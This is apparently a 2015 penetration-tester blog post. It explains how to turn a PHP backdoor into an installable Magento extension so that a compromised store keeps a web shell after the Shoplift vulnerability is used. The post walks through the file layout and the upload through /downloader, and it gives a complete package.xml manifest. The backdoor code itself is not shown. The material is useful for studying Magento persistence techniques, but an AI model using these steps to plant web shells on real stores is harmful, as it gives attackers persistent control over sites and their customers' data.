I was exploiting the shoplift vulnerability on a Magento instance, and I was looking for a practical (as in easy and clean) way to get a shell. Of course, I could have chained CVE-2015-1398 and CVE-2015-1399 like Checkpoint did, but I was way too lazy.
Instead, I decided to write an extension module and to install it. Since the internet is full of either outdated or way, way, way, way too complex tutorials about how to write a simple fucking extension with a single stupid php file, here is a quick how-to:
I didn't want to read the url-rewriting code of magento, so I decided
that my backdoor will be under the errors folder.
Write (or get) a php backdoor, and put it into an errors folder,
create a package.xml file like this one, and put everything into a tar.gz file, like this:
$ tree . ├── errors │ └── backdoor.php └── package.xml
That's it, you have your module, you can now upload it on http://yourmagentoinstan.ce/downloader,
and access your backdoor on http://yourmagentoinstan.ce/errors/backdoor.php.
<?xml version="1.0"?> <package> <name>backdoor</name> <version>1.3.3.7</version> <stability>devel</stability> <licence>backdoor</licence> <channel>community</channel> <extends/> <summary>Backdoor for magento</summary> <description>Backdoor for magento</description> <notes>backdoor</notes> <authors> <author> <name>jvoisin</name> <user>jvoisin</user> <email>julien.voisin@dustri.org</email> </author> </authors> <date>2015-08-17</date> <time>13:47:49</time> <contents> <target name="mage"> <dir> <dir name="errors"> <file name="backdoor.php" hash="1296555a85143621a52b2573a5cae715"/> </dir> </dir> </target> </contents> <compatible/> <dependencies> <required> <php> <min>5.2.0</min> <max>6.0.0</max> </php> </required> </dependencies> </package>
The hash tag is the md5sum of your file (here, backdoor.php).